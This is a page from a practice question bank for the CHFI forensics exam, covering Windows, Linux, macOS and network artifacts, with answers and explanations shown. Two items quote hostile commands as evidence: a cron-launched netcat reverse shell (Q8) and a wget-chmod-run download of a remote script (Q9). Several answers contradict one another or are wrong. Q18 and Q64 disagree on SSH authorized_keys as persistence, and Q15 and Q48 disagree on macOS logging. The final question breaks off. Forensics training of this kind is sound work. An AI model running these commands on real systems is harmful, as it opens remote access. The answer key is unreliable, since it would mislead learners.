CCNA Chfi Os Network Questions

75 of 216 questions · Page 1/3 · Chfi Os Network topic · Answers revealed

1
Multi-Selecthard

A network security analyst reviews firewall logs and identifies a high volume of outbound DNS queries to a known malicious domain from multiple internal hosts. Which THREE actions should the analyst take immediately?

Select 3 answers
A.Isolate the affected hosts from the network
B.Update antivirus signatures and run a full scan
C.Block the malicious domain at the firewall or DNS level
D.Conduct a forensic analysis of the affected hosts
E.Review DNS logs to identify other potential malicious domains
AnswersA, C, D

Isolation prevents lateral movement and further data exfiltration.

Why this answer

The high volume of DNS queries to a malicious domain indicates possible C2 communication. Immediate actions: block the domain at the firewall/DNS, isolate affected hosts to prevent further spread, and conduct a forensic investigation to understand the infection. Checking antivirus is good but not immediate; logs for later analysis are secondary.

2
Multi-Selecteasy

Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)

Select 2 answers
A.USBSTOR registry key
B.Prefetch files
C.Scheduled Tasks
D.LNK files
E.Registry Run keys (e.g., HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
AnswersC, E

Correct. Tasks can be set to run malware at specific times.

Why this answer

Run keys in the registry and scheduled tasks are standard persistence techniques. Prefetch and LNK files are forensic artifacts, not persistence mechanisms. USBSTOR tracks devices.

3
MCQmedium

A Linux system is suspected of being used as a pivot point. An analyst checks /proc/[pid]/fd/ and sees open file descriptors pointing to sockets. Which command would BEST determine the remote connections associated with these sockets?

A.netstat -anp
B.cat /proc/net/tcp
C.ls -la /proc/[pid]/fd/
D.lsof -i
AnswerD

lsof -i lists open network files with remote addresses.

Why this answer

lsof -i shows network connections and listening sockets, including remote addresses. It can read /proc fd info.

4
Multi-Selecteasy

Which TWO of the following are tools that can be used for timeline analysis in digital forensics?

Select 2 answers
A.Wireshark
B.Nmap
C.log2timeline
D.FTK Imager
E.Plaso
AnswersC, E

log2timeline is a tool for extracting timeline data from various sources.

Why this answer

log2timeline (option C) is a tool specifically designed for timeline analysis in digital forensics. It parses various log files and artifacts to create a super timeline, which is a comprehensive chronological record of system activity. This allows investigators to correlate events across multiple sources, such as file system timestamps, registry keys, and application logs.

Exam trap

EC-Council often tests the distinction between tools used for network analysis (Wireshark, Nmap) versus tools used for host-based timeline analysis (log2timeline, Plaso), leading candidates to confuse packet capture utilities with forensic timeline generators.

5
Multi-Selecthard

Which TWO of the following registry keys are commonly used to maintain persistence on Windows systems by automatically starting programs?

Select 2 answers
A.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
B.HKLM\SAM\SAM\Domains\Account\Users
C.HKLM\System\CurrentControlSet\Services
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E.HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
AnswersD, E

Programs listed here run when the current user logs on.

Why this answer

The Run key under both HKCU and HKLM is a standard autorun location. The RunOnce key also starts programs but runs them once at next logon.

6
MCQmedium

During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?

A.Nmap
B.Wireshark
C.log2timeline
D.Autopsy
AnswerC

log2timeline is the standard tool for creating super timelines from log files.

Why this answer

log2timeline (part of Plaso) is designed for timeline analysis of log files, including auth.log. It parses and correlates timestamps.

7
Multi-Selectmedium

A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?

Select 3 answers
A.Prefetch files
B.bash_history
C.Unified logging
D.FSEvents
E..plist files
AnswersC, D, E

Unified logging captures system and application logs in a centralized database.

Why this answer

macOS forensics frequently examines unified logs (for system events), .plist files (for configuration and application data), and FSEvents (for file system change history). bash_history is not the default for macOS (zsh is default). Prefetch files are Windows-only.

8
MCQmedium

An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?

A.Port scan 10.0.0.5 every 5 minutes
B.Establish a reverse shell back to the attacker every 5 minutes
C.Log system activity to a remote server
D.Download malicious software from 10.0.0.5
AnswerB

The -e option executes a program (shell) and connects its I/O to the socket, giving the attacker remote access.

Why this answer

This cron job uses netcat (nc) with the -e option to execute a shell (/bin/sh) and connect back to IP 10.0.0.5 on port 4444, creating a reverse shell. It runs every 5 minutes.

9
MCQmedium

During a forensic investigation of a compromised Linux server, the investigator examines the bash_history file of the root user. She finds the command: wget http://malicious.site/shell.sh && chmod +x shell.sh && ./shell.sh. What is the MOST likely intent of this command sequence?

A.Download and execute a web shell for persistent remote access
B.Compile a kernel module
C.Update the system packages
D.Perform a system backup to a remote server
AnswerA

This sequence downloads a shell script and executes it, which is a common method to install a backdoor.

Why this answer

The commands download a shell script, make it executable, and run it. This is typical of a web shell download and execution, providing remote access to the attacker.

10
MCQhard

A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?

A.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
B.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
C.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
D.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
AnswerC

Tracks USB storage devices and their first/last connect times.

Why this answer

The USBSTOR key records serial numbers and first/last connection times for USB storage devices.

11
MCQeasy

Which Windows Event ID is generated when a service is installed on a system?

A.4624
B.7045
C.4688
D.4720
AnswerB

7045 is specifically for service installation.

Why this answer

Event ID 7045 is logged when a new service is installed on a Windows system, providing details such as service name, binary path, and account.

12
MCQhard

During a network forensics investigation, an analyst reviews NetFlow data and notices a one-way flow of UDP traffic from an internal host to an external IP on port 53. However, the packet capture shows the external IP responding with large DNS responses. What type of data exfiltration technique is MOST likely being used?

A.ICMP tunneling
B.DNS tunneling
C.SSH tunneling
D.HTTP tunneling
AnswerB

DNS tunneling uses DNS queries/responses to exfiltrate data, often with large responses.

Why this answer

DNS tunneling involves encoding data in DNS queries and responses. The one-way flow observation might be due to NetFlow's view, but the large responses suggest data being returned via DNS responses.

13
MCQeasy

In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?

A.Tcpdump
B.Netstat
C.Nmap
D.Wireshark
AnswerD

Wireshark is a network protocol analyzer that captures and interactively browses traffic.

Why this answer

Wireshark is the industry-standard tool for packet capture and analysis, providing deep inspection of hundreds of protocols.

14
MCQhard

During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?

A.The program was executed at 02:30:00 UTC.
B.The program was executed at 03:15:22 UTC.
C.Execution time cannot be determined from prefetch files alone.
D.The program was executed at 03:10:22 UTC after adjusting for clock skew.
AnswerB

Prefetch file creation time is recorded when the program first runs, so 03:15:22 UTC is the execution start time (assuming clock is accurate). The +5 minute discrepancy means system time was ahead, but UTC is correct.

Why this answer

Prefetch files record the time the program was first run. The last modified timestamp of the executable is not directly related to execution time. The prefetch timestamp is the best indicator of first execution, but time zone and clock skew must be considered.

However, the question asks for the MOST accurate interpretation among the options; the prefetch file creation time directly records when the program was first executed, making that the execution time.

15
MCQmedium

During a Mac OS X forensic investigation, an analyst wants to review user application usage and system events for the last week. Which artifact provides a centralized, binary log of these activities?

A..plist files in ~/Library/Preferences
B.Unified logging (log stream)
C.Quick Look server logs
D.FSEvents files in /.fseventsd
AnswerD

FSEvents records file system changes with timestamps and can be parsed for forensic timeline.

Why this answer

FSEvents is a macOS feature that logs file system events in a binary format, useful for tracking file creation, modification, and deletion.

16
MCQmedium

During a network forensic investigation, an analyst examines a pcap file and finds multiple TCP SYN packets sent to a target IP on port 80, each from a different source IP address. No SYN-ACK packets are returned, but the target continues to send SYN-ACK responses for earlier packets. What attack is MOST likely occurring?

A.UDP flood attack
B.SYN flood attack
C.ARP spoofing attack
D.DNS amplification attack
AnswerB

Multiple SYN packets from varied sources, no subsequent ACKs, and target still responding indicate SYN flood.

Why this answer

A SYN flood attack sends many SYN packets without completing the handshake, exhausting the target's connection queue. The different source IPs indicate a distributed SYN flood or IP spoofing.

17
MCQhard

A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?

A.Reboot the system to clear the cron job from memory
B.Capture the script for analysis and preserve the cron entry as evidence
C.Delete the cron job immediately to prevent further damage
D.Run the script in a sandbox to determine its functionality
AnswerB

Forensic soundness requires collecting and analyzing the script without altering the system.

Why this answer

The cron job is a persistence mechanism. The examiner should capture the script and analyze it to understand the attacker's actions, preserving the file as evidence.

18
Multi-Selecthard

Which THREE of the following are persistence mechanisms that can be used on Linux systems?

Select 3 answers
A.Prefetch files
B.SSH authorized keys
C.Startup scripts in /etc/init.d
D.Cron jobs
E.Modifications to /etc/passwd to add new users
AnswersC, D, E

Scripts in init.d run at system startup.

Why this answer

Cron jobs, startup scripts in /etc/init.d, and modifications to /etc/passwd to create backdoor accounts are all persistence techniques on Linux. SSH keys are not a persistence mechanism but rather an access method.

19
MCQmedium

During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?

A.Normal software update download
B.Scheduled backup to a cloud service
C.Data exfiltration by an attacker
D.Denial-of-service attack against the server
AnswerC

Large off-hours transfers to external IPs are a classic exfiltration indicator.

Why this answer

Large off-hours data transfers to an external IP are typical of data exfiltration. Normal backup traffic may occur but is usually scheduled and to known destinations.

20
Multi-Selectmedium

Which TWO of the following are Windows artifacts that can provide evidence of file execution, including timestamps and paths?

Select 2 answers
A.Event ID 4720
B.SAM registry hive
C.Prefetch files (*.pf)
D.Pagefile.sys
E.LNK files
AnswersC, E

Prefetch files are created when an application is run and contain execution information.

Why this answer

Prefetch files store information about recently executed programs, and LNK files (shortcuts) record execution details including timestamps and target paths.

21
MCQeasy

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

A.A failed logon attempt
B.A successful user logon
C.A service was installed
D.A new user account was created
AnswerA

4625 is the event ID for failed logon.

Why this answer

Event ID 4625 indicates a failed logon attempt. This is a standard Windows security event used to track authentication failures.

22
MCQmedium

In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?

A.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
B.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
C.HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
D.NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run
AnswerC

Correct: This key runs programs for all users at boot.

Why this answer

Run keys under HKLM\Software\Microsoft\Windows\CurrentVersion\Run configure programs to start automatically for all users. The HKCU equivalent is per-user.

23
MCQhard

A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?

A.PowerShell was executed as part of a scheduled task or service
B.The prefetch file is corrupted
C.The user deleted their profile
D.The system clock was changed
AnswerA

Non-interactive execution (logon type 3, 4, or 5) won't show interactive logon events.

Why this answer

Prefetch files record execution times. If PowerShell ran but no interactive logon, it likely ran via a scheduled task or service, which doesn't create an interactive logon event (Event ID 4624 with logon type 2).

24
MCQeasy

Which Windows Event ID is generated when a new service is installed on a system?

A.4624
B.7045
C.4648
D.4720
AnswerB

7045 is service installation.

Why this answer

Event ID 7045 in the System log indicates a service was installed on the system.

25
MCQeasy

Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?

A.Autopsy
B.Sleuth Kit
C.Plaso
D.Wireshark
AnswerC

Plaso (log2timeline) is the command-line tool for creating super timelines.

Why this answer

Plaso (Python Log2Timeline) is the command-line tool for creating super timelines from various forensic artifacts.

26
MCQeasy

An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?

A.Follow TCP Stream
B.Statistics > HTTP
C.Export Objects > HTTP
D.Analyze > Expert Info
AnswerC

This extracts files transferred via HTTP from the capture.

Why this answer

Wireshark's 'Export Objects' feature allows extraction of files transferred via HTTP, SMB, etc. 'Follow TCP Stream' shows the stream content but does not export files.

27
Multi-Selecthard

Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)

Select 3 answers
A.Presence of .htaccess files with rewrite rules
B.Files with obfuscated code (e.g., base64 encoded strings)
C.Files located in web-accessible directories (e.g., /uploads) with execute permissions
D.High number of 404 errors in access logs
E.Unusual HTTP POST requests with large payloads to a single script
AnswersB, C, E

Obfuscation is used to hide malicious functionality from security tools.

Why this answer

Web shells often contain obfuscated code, are placed in web-accessible directories, and may be accessed via unusual HTTP methods like POST with encoded payloads.

28
MCQeasy

Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?

A.4624
B.4648
C.7045
D.4720
AnswerC

7045 is the event ID for service installation, commonly used by malware for persistence.

Why this answer

Event ID 7045 logs the installation of a new service, including service name, image path, and start type. Malware often creates services to achieve persistence.

29
MCQeasy

Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?

A.SECURITY
B.NTUSER.DAT
C.HKLM\SAM
D.SYSTEM
AnswerB

NTUSER.DAT is loaded into HKEY_CURRENT_USER and contains user preferences and activity artifacts.

Why this answer

NTUSER.DAT is the registry hive that contains user-specific settings and is loaded into HKEY_CURRENT_USER upon logon. It includes UserAssist, MRU lists, and other user activity artifacts.

30
MCQhard

An analyst is examining a PCAP file in Wireshark and notices a series of TCP SYN packets sent to multiple ports on a single IP address, with no subsequent SYN-ACK replies. What type of network activity does this indicate?

A.A denial of service attack
B.A man-in-the-middle attack
C.A TCP handshake for normal connection establishment
D.A port scan attempting to identify open ports
AnswerD

This is characteristic of a SYN scan, where the scanner sends SYN packets and waits for SYN-ACKs from open ports.

Why this answer

Sending SYN packets to many ports without receiving SYN-ACKs indicates a port scan, likely a TCP SYN scan, to discover open ports.

31
MCQeasy

In network forensics, which type of log is BEST for identifying all outbound connections from internal hosts to external IP addresses on specific ports?

A.Firewall logs
B.IDS logs
C.Proxy logs
D.NetFlow logs
AnswerA

Firewall logs capture all traffic passing through the firewall, including outbound connections.

Why this answer

Firewall logs record allowed and denied traffic, including source/destination IP and port, ideal for tracking outbound connections.

32
MCQmedium

A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?

A.It is evidence of USB device insertion.
B.It may be part of a lateral movement technique using remote execution.
C.It shows the user's recently accessed files.
D.It is a prefetch artifact indicating the script was executed.
AnswerB

An LNK file pointing to a remote script is often used in attacks like PsExec or scheduled tasks to move laterally.

Why this answer

LNK files can be used for persistence or lateral movement. A shortcut to a remote script could indicate the system is configured to run a malicious script from another machine, potentially for propagation.

33
MCQhard

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?

A./var/log/syslog
B./etc/ssh/sshd_config
C.~/.ssh/authorized_keys
D./etc/passwd
AnswerC

This file lists public keys permitted to authenticate as root. Checking its contents can reveal unauthorized keys.

Why this answer

The log shows acceptance of a public key. To determine if the key was unauthorized, you must examine the authorized_keys file for root (~/.ssh/authorized_keys) to see if the key was added maliciously.

34
MCQhard

A forensic analyst is investigating a Windows 10 system and needs to determine if a USB device was ever connected. Which registry key would provide a comprehensive list of USB devices that have been attached, including the first and last connection times?

A.HKLM\SYSTEM\CurrentControlSet\Enum\USB
B.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
C.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
D.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\PnpLockdownFiles
AnswerB

USBSTOR lists all USB storage devices with first/last connection times under Properties.

Why this answer

The USBSTOR key records all USB storage devices with timestamps. Enum/USB contains device descriptors but not timestamps. SetupAPI logs are in a different location.

35
MCQhard

During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?

A.The system was rebooted recently
B.The malware is a kernel module
C.A process with PID 12345 is running the malware
D.The malware was executed via a cron job
AnswerC

/proc/12345/exe points to the actual executable; a hidden location indicates malicious activity.

Why this answer

/proc/[pid]/exe is a symbolic link to the executable of a running process. The entry indicates a process with PID 12345 is running from a hidden file in /tmp, strongly suggesting malware execution.

36
MCQmedium

During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?

A.bash_history for suspicious commands
B./etc/shadow for recent modifications
C.~/.ssh/authorized_keys for unauthorized keys
D./var/log/syslog for cron job entries
AnswerC

Unauthorized SSH keys are often added in authorized_keys; this file should be examined for unknown entries.

Why this answer

The presence of an authorized key from an unknown IP suggests an attacker added their public key. Checking ~/.ssh/authorized_keys on the affected account will reveal any unauthorized keys.

37
MCQeasy

A security analyst reviews Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?

A.Brute-force password attack
B.Kerberos golden ticket attack
C.ARP spoofing attack
D.Pass-the-hash attack
AnswerA

Multiple failed logons from different sources suggest systematic password guessing.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple failures from different IPs in a short period is characteristic of a brute-force password guessing attack.

38
Multi-Selecthard

A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)

Select 3 answers
A.Low TTL values in DNS responses
B.DNS queries sent to multiple different DNS servers
C.DNS responses with unusually large payloads (e.g., TXT records)
D.High volume of DNS queries to a single domain
E.DNS queries for random-looking subdomains
AnswersC, D, E

Large response sizes can indicate data being encoded in DNS responses.

Why this answer

DNS exfiltration often uses high query volumes, unusual domain names, and large TXT records.

39
Multi-Selectmedium

Which TWO of the following are forensic artifacts found on macOS systems that can help reconstruct user activity?

Select 2 answers
A..plist files
B.Unified logging
C.Prefetch files (*.pf)
D.Registry hive files
E.Event ID 4624
AnswersA, B

Property list files store configuration and usage data for applications.

Why this answer

Unified logging captures detailed system and user activity logs, and .plist files store application preferences and usage data. Both are valuable for reconstructing user actions.

40
Multi-Selecthard

Which THREE of the following are indicators of a webshell compromise on a web server?

Select 3 answers
A.High CPU usage from web server processes
B.Regular successful logins to the server with correct credentials
C.Presence of files with extensions like .php, .asp, or .jsp in web directories that are not part of the original application
D.Unexpected outbound connections from the web server to unknown IP addresses
E.Decrease in network traffic
AnswersA, C, D

Execution of arbitrary commands or scripts can spike CPU usage.

Why this answer

Unusual files in web directories, high CPU usage due to command execution, and unexpected outbound traffic are common signs of a webshell compromise. Log entries with 'cmd' parameter are also typical.

41
MCQmedium

An analyst reviews NetFlow logs and sees a single internal host communicating with multiple external IPs on port 53 (DNS) over a short period, with each session transferring approximately 1500 bytes. What suspicious activity might this indicate?

A.DNS tunneling for data exfiltration
B.A DNS amplification attack
C.Dynamic DNS update attempts
D.Normal DNS resolution for web browsing
AnswerA

Correct. The pattern matches DNS tunneling.

Why this answer

DNS tunneling often uses small DNS queries/responses to exfiltrate data or establish C2. The consistent small packet size and many external destinations are indicators.

42
MCQmedium

A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?

A.Clearing browser history
B.Establishing persistence for malware
C.Updating system time
D.Configuring firewall rules
AnswerB

The Run key launches programs at user logon, commonly used for persistence.

Why this answer

The Run key is a common auto-start location used for persistence. Writing to it ensures the process executes at user logon.

43
MCQhard

During an incident response on a Linux server, you find the following entry in /var/log/auth.log: "Mar 10 12:34:56 server sshd[1234]: Failed password for root from 10.0.0.5 port 34567 ssh2". Which of the following is the BEST immediate action to prevent further unauthorized access?

A.Block the IP address 10.0.0.5 at the firewall
B.Edit /etc/ssh/sshd_config to set PermitRootLogin no and PasswordAuthentication no, then restart sshd
C.Delete the root user account
D.Change the root password to a complex password
AnswerB

This disables root SSH login and password authentication, forcing key-based authentication, which mitigates brute-force attacks.

Why this answer

The log shows a failed SSH login attempt for root from an external IP. The most effective immediate action is to change the SSH configuration to disable root login and key-based authentication only (PasswordAuthentication no), then restart the service. This blocks password guessing attacks on root.

44
MCQhard

During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?

A.The system was shut down improperly
B.The file is corrupted
C.The user deleted the history
D.The HISTSIZE environment variable is set to 0 or the history file is redirected to /dev/null
AnswerD

Setting HISTSIZE=0 disables history; redirecting to /dev/null discards entries.

Why this answer

If HISTSIZE is set to 0 or the history file is a symlink to /dev/null, commands are not recorded. This is common in forensic evasion.

45
MCQmedium

Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?

A.log2timeline
B.Sleuth Kit
C.Nmap
D.Wireshark
AnswerA

log2timeline/Plaso is the forensic tool for creating timelines from multiple artifacts.

Why this answer

log2timeline (and its successor Plaso) is the standard tool for timeline analysis, parsing artifacts into a super timeline.

46
MCQhard

A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?

A..plist files
B.FSEvents
C.Core Storage logs
D.Apple Unified Logging
AnswerD

The 'log show' command retrieves entries from the unified logging system, which encompasses system and user activity logs.

Why this answer

The 'log show' command with --predicate queries the Apple Unified Logging system, which centralizes logs from various subsystems.

47
MCQeasy

In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?

A.Network reconnaissance (ping sweep)
B.A man-in-the-middle attack
C.A DoS attack using ICMP floods
D.A DNS amplification attack
AnswerA

Ping sweeps use ICMP echo requests to multiple hosts to identify live systems.

Why this answer

Large numbers of ICMP echo requests (pings) with varying payload sizes are characteristic of a ping sweep or network reconnaissance to identify live hosts.

48
MCQeasy

In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?

A.system.log
B.Audit log
C.FSEvents
D.Unified logging
AnswerD

Unified logging is the current macOS logging system.

Why this answer

Unified logging (os_log) is the modern macOS logging system, storing events in a binary format and queried via the 'log' command.

49
MCQmedium

During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?

A.Bash history
B.Systemd service
C.Cron job
D.Init script
AnswerC

Cron jobs are scheduled tasks; entries in /etc/cron.d/ run at specified intervals.

Why this answer

Cron jobs are a common Linux persistence mechanism. Entries in /etc/cron.d/ are system-wide cron jobs that execute at scheduled intervals.

50
MCQmedium

A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?

A.HKLM\SYSTEM
B.HKLM\SAM
C.HKLM\SOFTWARE
D.NTUSER.DAT
AnswerD

NTUSER.DAT is the user hive loaded under HKCU, containing ShellBags, UserAssist, MRU, and other user activity traces.

Why this answer

NTUSER.DAT is the user-specific registry hive loaded under HKCU, containing ShellBags, UserAssist, MostRecentlyUsed (MRU) lists, and other user activity artifacts. SAM stores local account hashes, SYSTEM stores system-wide config, and SOFTWARE stores installed applications info.

51
MCQeasy

Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?

A.HKU\.DEFAULT
B.HKLM\SYSTEM
C.HKLM\SAM
D.NTUSER.DAT
AnswerD

NTUSER.DAT is the user-specific hive for settings and recent items.

Why this answer

NTUSER.DAT is the registry hive that contains user-specific settings, including MRU lists and application preferences.

52
Multi-Selectmedium

A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?

Select 2 answers
A.HKLM\SAM
B.C:\Windows\Prefetch
C.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags
D.HKLM\SYSTEM\CurrentControlSet\Services
E.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
AnswersD, E

Services subkeys can be configured to start automatically, used by malware for persistence.

Why this answer

Run keys (e.g., HKCU\Software\Microsoft\Windows\CurrentVersion\Run) are common startup locations. The SAM hive stores password hashes, not persistence. Prefetch tracks program execution but does not cause auto-start.

Services can be used for persistence but are not a registry key (they use subkeys under SYSTEM).

53
Multi-Selectmedium

Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)

Select 2 answers
A.Event ID 4624
B.SAM hive
C.Prefetch files
D.LNK files
E.ShellBags
AnswersD, E

Correct. LNK files point to recently opened files.

Why this answer

ShellBags store folder view settings and paths, while LNK files are shortcuts that record the target file path and timestamps. Both can indicate accessed locations.

54
MCQmedium

A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?

A.The session was hijacked after the handshake
B.A TCP half-open scan was performed
C.The TCP connection was successfully established
D.The connection was refused by the server
AnswerC

The three-way handshake completed, followed by data transfer.

Why this answer

This is the standard three-way handshake (SYN, SYN-ACK, ACK) followed by data (HTTP GET), indicating a successful TCP connection establishment.

55
MCQhard

A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?

A.It automatically correlates events from different sources and provides a unified timeline
B.It can detect malware by signature scanning
C.It generates a timeline only from Windows Event Logs
D.It encrypts the timeline for secure storage
AnswerA

Plaso extracts timestamps from many artifacts and creates a single timeline, enabling efficient analysis of event sequences.

Why this answer

Plaso automates the extraction and correlation of timestamps from multiple artifacts (registry, event logs, file system, etc.) into a unified timeline, saving time and reducing errors compared to manual extraction.

56
Multi-Selecteasy

Which TWO of the following are common Linux log files that can be used for forensic analysis?

Select 2 answers
A./etc/passwd
B./var/log/syslog
C./var/log/auth.log
D./etc/shadow
E./proc/cpuinfo
AnswersB, C

Captures system logs including kernel messages, services, etc.

Why this answer

/var/log/auth.log records authentication attempts, and /var/log/syslog records general system messages. Both are valuable in forensic investigations.

57
MCQmedium

A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?

A.A denial-of-service (DoS) flood
B.A port scan reconnaissance
C.A man-in-the-middle attack
D.Normal web browsing traffic
AnswerB

SYN packets to multiple ports without replies indicate scanning for open ports.

Why this answer

A port scan sends SYN packets to various ports; if no SYN-ACK is received, the ports are likely filtered or closed, characteristic of a scan.

58
MCQhard

A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?

A.Plaso
B.Autopsy
C.Volatility
D.Sleuth Kit
AnswerA

Plaso (log2timeline) creates super timelines by parsing multiple sources.

Why this answer

Plaso (log2timeline) is a timeline creation tool that aggregates data from various forensic artifacts into a super timeline.

59
MCQmedium

A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?

A.ARP spoofing
B.SYN flood
C.DNS amplification
D.Ping of death
AnswerB

SYN flood is a DoS attack with many SYN packets.

Why this answer

A SYN flood sends many SYN packets without completing the handshake, overwhelming the target. The source IPs may be spoofed.

60
Multi-Selectmedium

Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?

Select 3 answers
A.4625 - An account failed to log on
B.4648 - A logon was attempted using explicit credentials
C.4624 - An account was successfully logged on
D.4656 - A handle to an object was requested
E.7045 - A service was installed in the system
AnswersA, B, C

Records failed authentication attempts.

Why this answer

Event ID 4624 logs successful logons, 4625 logs failed logons, and 4648 logs logon attempts using explicit credentials (e.g., RunAs). These are key for tracking authentication events.

61
Multi-Selectmedium

Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)

Select 2 answers
A.Pagefile.sys
B.System Restore points
C.Jump Lists
D.Prefetch files
E.Windows Error Reporting logs
AnswersC, D

Jump Lists record recently accessed files per application, showing usage.

Why this answer

Prefetch files store execution information for applications, and Jump Lists track recent files opened by applications, indicating usage.

62
MCQeasy

In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?

A.Jump lists
B.ShellBags
C.Prefetch files
D.LNK files
AnswerD

LNK files track file access via shortcuts.

Why this answer

LNK files (shortcuts) are created automatically when a user opens a file, and they contain metadata such as the target path and timestamps.

63
MCQmedium

A Linux system administrator notices unusual outbound connections from a server. Which of the following commands would MOST effectively capture a list of all current network connections along with the associated process IDs?

A.sudo iptables -L
B.sudo lsmod
C.sudo ifconfig -a
D.sudo ss -tunap
AnswerD

ss -tunap lists all TCP/UDP sockets with numeric addresses, process info, and PID.

Why this answer

The 'ss -tunap' command displays TCP/UDP sockets with process information. 'netstat -tunap' is similar but deprecated on many systems. 'lsof -i' shows open files for network connections.

64
Multi-Selecthard

Which THREE of the following are common persistence mechanisms found in Linux systems? (Select three.)

Select 3 answers
A..bashrc in user home directories
B.SSH authorized_keys
C.Systemd services (.service files)
D.Cron jobs (crontab)
E./etc/passwd file modification
AnswersB, C, D

Adding an attacker's public key to authorized_keys allows persistent SSH access.

Why this answer

